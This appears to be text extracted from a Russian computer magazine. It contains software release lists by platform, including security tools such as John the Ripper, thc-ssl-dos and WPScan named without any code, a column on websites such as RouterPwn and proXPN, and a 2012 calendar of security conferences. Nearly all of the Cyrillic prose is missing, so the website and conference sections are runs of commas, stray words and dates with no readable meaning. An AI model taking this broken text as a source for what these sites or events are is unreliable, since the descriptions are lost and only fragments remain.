Emulation Framework 1.0.0
File Disclosure Browser
GenXE 0.9.0
Hades
John the Ripper 1.7.9
MagicTree 1.0
MeMMoN
NetworkMiner 1.1
NetworkMiner 1.2
NMapSi4 0.3 beta
PEiD Plugins
Rec Studio 4
thc-ssl-dos 1.4
USB Cop 1.0
VanishCrypt
VirtualKD 2.6
w3af 1.1
Windbgshark 0.0.1
Window Maximizer v2.00
Windows-privesc-check
WPScan 1.1
X-Scan 3.3
>Multimedia
All Free ISO Burner
Avidemux 2.5.5
AVS Media Player 4.1.8.93
ExifTool 8.71
Free Audio Converter 5.0.2
Free Screen Video Recorder
2.5.19
Jimp 2.0.0
KMPlayer 3.0.0.1442
ManyCam 2.6.60
Photoscape 3.5
Sonarca Sound Recorder 3.7.8
Songbird 1.10.1
STDU Viewer 1.6.62
Sysygy Image Viewer 1.3
Ubuntu Skin Pack 8.0
WindowTabs
>Misc
7stacks 1.5
Droid Explorer 0.8.8.2
EssentialPIM 4.5
FavBackup 2.1.1
Fences 1.01
FileMenu Tools 6.0.1
FreeCommander 2009.02b
PointerStick 1.21
Q-Dir 4.87
Rainmeter 2.1
RocketDock 1.35
SumatraPDF 1.9
UboroBot 2.0
ViewFD 2.3.0
Volumouse 1.72
WinSplit Revolution 11.04
>>WINDOWS
>Development
AjaxControlToolkit 4.1.51116
DEV-C++ 4.9.9.2
Dia 0.97.1
Facebook C# SDK 5.3.2
HAP 1.4.0
HeidiSQL 6.0
HiAsm 4.4
Json.NET 4.0
Mocha 0.0.8
PHPExcel 1.7.6
PTVS 1.1
PyScripter 2.4.3
SDL 1.2.14
StyleCop 4.6
TReplacer 2.11
Utilu IE Collection 1.7.2.0
>Security
Blueproximity 1.2.5
Chatsniff 1.0
Clamtk 4.36
Emulation Framework 1.0.0
Fwbuilder 5.0.0.3568
Gadmin-openvpn-server 0.1.5
GenXE 0.9.0
GoLISMERO
Gsasl 1.6.1
HOPPER
Ipclassify 1.1
>Net
Aweather 0.6
Chrome 15
Dada_mail 4.8.4
Evolution 3.2.2
Firefox 8.0.1
Getleft 1.2
Instantbird 1.1
Knemo 0.7.2
Ktorrent 4.1.3
Lftp 4.3.3
Liferea 1.6.6b
Linphone 3.4.3
Linuxdcpp 1.1.0
Smuxi 0.8
Stealthnet 0.8.7.9
Swift 1.0
Tvdownloader 0.7.2
Watchvideo 2.2.1
>Games
Flightgear 2.4.0
Netrek 3.3.0
>Devel
Apache_tika 1.0
Dlib 17.44
Freebasic 0.23.0
Geany 0.21
Groovy 1.8.4
Gtk 3.3.4
Javatools 0.44
Jvcl 3.45
Libglass 2.0.0
Libmicrohttpd 0.9.17
Maveryx 1.3.0
Nant 0.91
Open64 5.0
Padre 0.92
Pypy 1.7
Quexml 1.3.7
Raptor2 2.0.5
Ruby 1.9.3-p0
Valgrind 3.7.0
Libreoffice 3.4.4
Metamorphose 1.1.2
Nip2 7.26.3
Optipng 0.6.5
Pyroom 0.4.1
Tomboy 1.9.3
Wavesurfer 1.8.8p3
Xine 1.1.20
Xorriso 1.1.8
>>MAC
Amaya 11.3.1
AppHack 1.1
Aptana Studio 3.0
Art of Illusion 2.9
Boxer 1.2
Clementine Music Player 0.7.1
DeTune 1.0.6
DVDTheque 3.1.2
GitHub 1.1
GV Connect Widget 2.1.1
JollysFastVNC 1.32
Magican 0.9.63
Mou 0.7.0
RaidEye 2.0
SourceTree 1.2.9
Tincta 1.3.1
Veusz 1.14
VMware Fusion 4.1.1
Winamp 0.7.1
>X-distr
openSUSE 12.1
>System
Apt-dater 0.8.6
Css 20111030
Di 4.31
Freeipa 2.1.3
Glpi 0.80.5
Grep 2.10
Libertine 5.1.3-2
Linux 3.1.3
Pbis 6.1.0.8729
Pf-kernel 3.1.3
Synctool 5.1
Virtualbox 4.1.6
Webmin 1.570
Winetricks 20111115
Zabbix 1.8.9
>Server
Apache 2.2.21
Asterisk 1.6.2.20
Bind 9.8.1-p1
Cups 1.5.0
Dhcp 4.2.3
Dovecot 2.0.16
Freeradius 2.1.12
Lighttpd 1.4.29
Mysql 5.5.18
Nsd 3.2.9
Openldap 2.4.27
Openvpn 2.2.1
Postfix 2.8.7
Postgresql 9.1.1
UNITS / WWW2
WWW2
ROUTERPWN
www.routerpwn.com
, . , mac_find (
MAC-) phenoelit (
).
, . ,
, ,
IP- . ,
:).
C
KICKSEND
kicksend.com
,
Rapidshare , . -
, e-mail . , ,
, , :
e-mail 500 ? , , 1 . .
PROXPN
proxpn.com
, proXPN, one-click-
VPN- . ,
OpenVPN, , , . ,
proXPN . , . ,
. (, WiFi-),
.
VPN-
JPC 2
jpc2.com
,
.
Javascript PC Emulator (bellard.org/jslinux),
( JavaScript), Linux. JPC 2 , , Java : Windows XP Ubuntu .
jpc2.com, .
, .
Windows XP Ubuntu
UNITS / 2012
NY2K+12
. MUST SEE
MUST VISIT ,
.
- , .
: .
,
.
20-23
14-16
30-31
2012
HITB
BLACKHAT
PHDAYS
CONFIDENCE
conference.hitb.org
www.blackhat.com
www.phdays.ru
confidence.org.pl
, ,
,
,
,
,
.
. , ,
.
PHDAYS
.
,
. ,
CTF-.
:
, ,
.
,
:).
26-29
25-26
2012
DEFCON
CC'2012
ZERONIGHTS
www.defcon.org
cc.org.ru
www.zeronights.ru
DEFCON
RUSSIA
, 20-
-.
,
:
!
demoscene-.
.
.
,
: ,
.
!
www.defcon-russia.ru
2011 5
.
IT/-,
. !
CODING
ALEKSANDR-EHKKERT@RAMBLER.RU